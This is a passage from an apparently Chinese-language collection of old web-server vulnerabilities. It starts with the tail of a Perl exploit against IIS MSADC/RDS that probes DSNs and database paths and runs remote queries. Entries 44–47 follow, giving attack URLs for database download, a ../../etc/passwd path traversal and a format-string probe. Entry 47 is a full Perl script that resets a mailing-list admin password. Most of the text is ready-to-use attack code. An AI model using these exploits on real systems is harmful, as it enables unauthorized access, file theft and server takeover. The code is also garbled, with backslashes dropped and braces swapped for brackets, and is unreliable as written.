my ($p1, $p2, $p3, $p4)=@_;
open(OUT, ">rds.save") || print "Problem saving parameters...n";
print OUT "$ipn$p1n$p2n$p3n$p4n";
close OUT;}

##############################################################################

sub load {
my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)}; dbq=";
open(IN,"<rds.save") || die("Couldn&#39;t open rds.saven");
@p=<IN>; close(IN);
$ip="$p[0]"; $ip=~s/n//g; $ip.="." if ($ip=~/[a-z]$/);
$target= inet_aton($ip) || die("inet_aton problems");
print "Resuming to $ip ...";
$p[3]="$p[3]"; $p[3]=~s/n//g; $p[4]="$p[4]"; $p[4]=~s/n//g;
if($p[1]==1) {
$reqlen=length( make_req(1,"$p[3]","$p[4]") ) - 28;
$reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(1,"$p[3]","$p[4]"));
if (rdo_success(@results)){print "Success!n";}
else { print "failedn"; verbose(odbc_error(@results));]
elsif ($p[1]==3){
if(run_query("$p[3]")){
print "Success!n";} else { print "failedn"; ]
elsif ($p[1]==4){
if(run_query($drvst . "$p[3]")){
print "Success!n"; } else { print "failedn"; ]
exit;}

##############################################################################

sub create_table {
my ($in)=@_;
$reqlen=length( make_req(2,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(2,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 1 if $temp=~/Table &#39;AZZ&#39; already exists/;
return 0;}

##############################################################################

sub known_dsn {
# we want &#39;wicca&#39; first, because if step 2 made the DSN, it&#39;s ready to go
my @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
"banner", "banners", "ads", "ADCDemo", "ADCTest");

foreach $dSn (@dsns) {
print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
print "$dSn successfuln";
if(run_query("DSN=$dSn")){
print "Success!n"; save (3,3,"DSN=$dSn",""); exit; } else {
print "Something&#39;s borked. Use verbose next timen";]} print "n";}

##############################################################################

sub is_access {
my ($in)=@_;
$reqlen=length( make_req(5,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(5,$in,""));
my $temp= odbc_error(@results);
verbose($temp); return 1 if ($temp=~/Microsoft Access/);
return 0;}

##############################################################################

sub run_query {
my ($in)=@_;
$reqlen=length( make_req(3,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(3,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 0;}

##############################################################################

sub known_mdb {
my @drives=("c","d","e","f","g");
my @dirs=("winnt","winnt35","winnt351","win","windows");
my $dir, $drive, $mdb;
my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";

# this is sparse, because I don&#39;t know of many
my @sysmdbs=( "\catroot\icatalog.mdb",
"\help\iishelp\iis\htm\tutorial\eecustmr.mdb",
"\system32\certmdb.mdb",
"\system32\certlog\certsrv.mdb" ); #these are %systemroot%

my @mdbs=( "\cfusion\cfapps\cfappman\data\applications.mdb",
"\cfusion\cfapps\forums\forums_.mdb",
"\cfusion\cfapps\forums\data\forums.mdb",
"\cfusion\cfapps\security\realm_.mdb",
"\cfusion\cfapps\security\data\realm.mdb",
"\cfusion\database\cfexamples.mdb",
"\cfusion\database\cfsnippets.mdb",
"\inetpub\iissamples\sdk\asp\database\authors.mdb",
"\progra~1\common~1\system\msadc\samples\advworks.mdb",
"\cfusion\brighttiger\database\cleam.mdb",
"\cfusion\database\smpolicy.mdb",
"\cfusion\databasecypress.mdb",
"\progra~1\ableco~1\ablecommerce\databases\acb2_main1.mdb",
"\website\cgi-win\dbsample.mdb",
"\perl\prk\bookexamples\modsamp\database\contact.mdb",
"\perl\prk\bookexamples\utilsamp\data\access\prk.mdb"
); #these are just
foreach $drive (@drives) {
foreach $dir (@dirs){
foreach $mdb (@sysmdbs) {
print ".";
if(create_table($drv . $drive . ":\" . $dir . $mdb)){
print "n" . $drive . ":\" . $dir . $mdb . " successfuln";
if(run_query($drv . $drive . ":\" . $dir . $mdb)){
print "Success!n"; save (4,4,$drive . ":\" . $dir . $mdb,""); exit;
} else { print "Something&#39;s borked. Use verbose next timen"; ]]}


foreach $drive (@drives) {
foreach $mdb (@mdbs) {
print ".";
if(create_table($drv . $drive . $dir . $mdb)){
print "n" . $drive . $dir . $mdb . " successfuln";
if(run_query($drv . $drive . $dir . $mdb)){
print "Success!n"; save (4,4,$drive . $dir . $mdb,""); exit;
} else { print "Something&#39;s borked. Use verbose next timen"; ]]
}

##############################################################################

sub hork_idx {
print "nAttempting to dump Index Server tables...n";
print " NOTE: Sometimes this takes a while, other times it stallsnn";
$reqlen=length( make_req(4,"","") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw2(make_header() . make_req(4,"",""));
if (rdo_success(@results)){
my $max=@results; my $c; my %d;
for($c=19; $c<$max; $c++){
$results[$c]=~s/x00//g;
$results[$c]=~s/[^a-zA-Z0-9:~ \._]/n/g;
$results[$c]=~s/[^a-zA-Z0-9:~ \._n]//g;
$results[$c]=~/([a-zA-Z]:\)([a-zA-Z0-9 _~\]+)\/;
$d="";}
foreach $c (keys %d){ print "$cn"; }
} else {print "Index server doesn&#39;t seem to be installed.n"; ]

##############################################################################

sub dsn_dict {
open(IN, "<$args") || die("Can&#39;t open external dictionaryn");
while(<IN>){
$hold=$_; $hold=~s/[rn]//g; $dSn="$hold"; print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
print "$dSn successfuln";
if(run_query("DSN=$dSn")){
print "Success!n"; save (3,3,"DSN=$dSn",""); exit; } else {
print "Something&#39;s borked. Use verbose next timen";]}
print "n"; close(IN);}

##############################################################################

sub sendraw2 {# ripped and modded from whisker
sleep($delay); # it&#39;s a DoS on the server! At least on mine...
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname(&#39;tcp&#39;)||0) ||
die("Socket problemsn");
if(connect(S,pack "SnA4x8",2,80,$target)){
print "Connected. Getting data";
open(OUT,">raw.out"); my @in;
select(S); $|=1;print $pstr;
while(<S>){ print OUT $_; push @in, $_; print STDOUT ".";}
close(OUT); select(STDOUT); close(S); return @in;
} else { die("Can&#39;t connect...n"); ]

##############################################################################

sub content_start { # this will take in the server headers
my (@in)=@_; my $c;
for ($c=1;$c<500;$c++) {
if($in[$c] =~/^x0dx0a/){
if ($in[$c+1]=~/^HTTP/1.[01] [12]00/) { $c++; }
else { return $c+1; ]}
return -1;} # it should never get here actually

##############################################################################

sub funky {
my (@in)=@_; my $error=odbc_error(@in);
if($error=~/ADO could not find the specified provider/){
print "nServer returned an ADO miscofiguration messagenAborting.n";
exit;}
if($error=~/A Handler is required/){
print "nServer has custom handler filters (they most likely are patched)n";
exit;}
if($error=~/specified Handler has denied Access/){
print "nServer has custom handler filters (they most likely are patched)n";
exit;]

##############################################################################

sub has_msadc {
my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0nn");
my $base=content_start(@results);
return 1 if($results[$base]=~/Content-Type: application/x-varg/);
return 0;}

########################



四十四. SmartWin CyberOffice Shopping Cart
Smartwin Technology CyberOffice Shopping Cart是一种购物车应用程序，它被用在那些运行Windows NT 4.0或2000系统、允许进行电子商务交易的网站上。远程用户可能读取运行有Smartwin Technology CyberOffice Shopping Cart 2.0的网站的_private目录。默认情况下任何人对_private目录都有读权限。
攻击：http://target/_private/shopping_cart.mdb

四十五. Moreover.com CGI 文件泄露漏洞
新闻服务商Moreover.com 提供的catched_feed.cgi V1.0的脚本存在这样一个漏洞；这个脚本有获得文件 的功能，本来是用来返回一个指定文件的内容给浏览器，可是由于没有在用户输入的字符串中过滤".."字符串，所以通过构造一个URL，提交给这个脚本，可以获得CGI脚本不允许的文件内容，必须保证这个文件是HTTP用户可以读的；
攻击：http://victim/cgi-bin/cached_feed.cgi?../../../.+/etc/passwd

四十六. Unixware SCOhelp CGI程序格式串漏洞
SCO Unixware 7 缺省安装时会包含sochelp组件。这是一个监听在tcp 457端口的HTTP服务器，允许用户访问帮助手册以及其他的一些文档。它的一个用来完成搜索功能的CGI程序存在一个格式串漏洞，允许远程用户在主机上执行任意代码。尽管攻击者只能得到&#39;nobody&#39;用户权限（缺省状态下），仍然会给用户非法访问主机系统的机会，他可能进一步获取更高权限。
攻击：http://target:457/search97cgi/vt ... &queryText=%25x
可以让服务器产生下列响应：
--
Internal error: STR_sprintf: Invalid format (Error E1-0142 (Query
Builder): Invalid character &#39;%&#39; (0x25))

Result
Search failed: -40

Result
Error E1-0142 (Query Builder): Invalid character &#39;

Result
Error E1-0130 (Query Builder): Syntax error in query string near
character 1

Result
Error E1-0133 (Query Builder): Error parsing query: 81887e0

Result
VdkSearchNew failed, error -40

Result
Request failed for REQUEST_METHOD=, QUERY_STRING=

Component
Component (vsearch) failed in processing request, -2

Action
Action (FilterSearch) failed while processing request in component
(vsearch), -2

Service Manager
Action (FilterSearch) failed in processing request, -2
S97IS Service manager failed to process request


四十七. Subscribe Me LITE 更改管理员口令漏洞
任何远程用户都能修改CGI Script Centers&#39; Subscribe Me Lite的管理员口令。这使得远程用户拥有完全的管理权限，包括从邮件列表中增加和删除用户。
攻击：
#!/usr/bin/perl -w

## Subscribe Me Lite 2.0 exploit / www.cgiscriptcenter.com
## This exploits changes the administrator password and
## let&#39;s anyone take over the mailing list. You can send
## bogus e-mail to everyone on the list.
##
## May work on earlier versions, but not sure - not sure
## if it will work on the Professional version either.
##
## teleh0r@doglover.com / anno 2000
## httpd://teleh0r.cjb.net

use strict;
use Socket;

if (@ARGV < 2) {
 print("Usage: $0 <target> <newpass>n");
 exit(1);
}

my($target,$newpass,$crypt,$length,$command,$agent,$sploit,$iaddr,$paddr,$pr
oto);

($target,$newpass) = @ARGV;

$crypt = crypt($newpass, &#39;aa&#39;);
$length = 34 + length($newpass);

print("nRemote host: $targetn");
print("CGI-script: /cgi-bin/subscribe.pln");
print("New password: $newpass / $cryptnn");

$command = "pwd=$newpass&pwd2=$newpass&setpwd=++Set+Password++";
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

$sploit=
"POST /cgi-bin/subscribe.pl HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $length
$command";

$iaddr = inet_aton($target) || die("Error: $!n");
$paddr = sockaddr_in(80, $iaddr)|| die("Error: $!n");
$proto = getprotobyname(&#39;tcp&#39;)|| die("Error: $!n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto)|| die("Error: $!n");
connect(SOCKET, $paddr) || die("Error: $!n");
send(SOCKET,"$sploit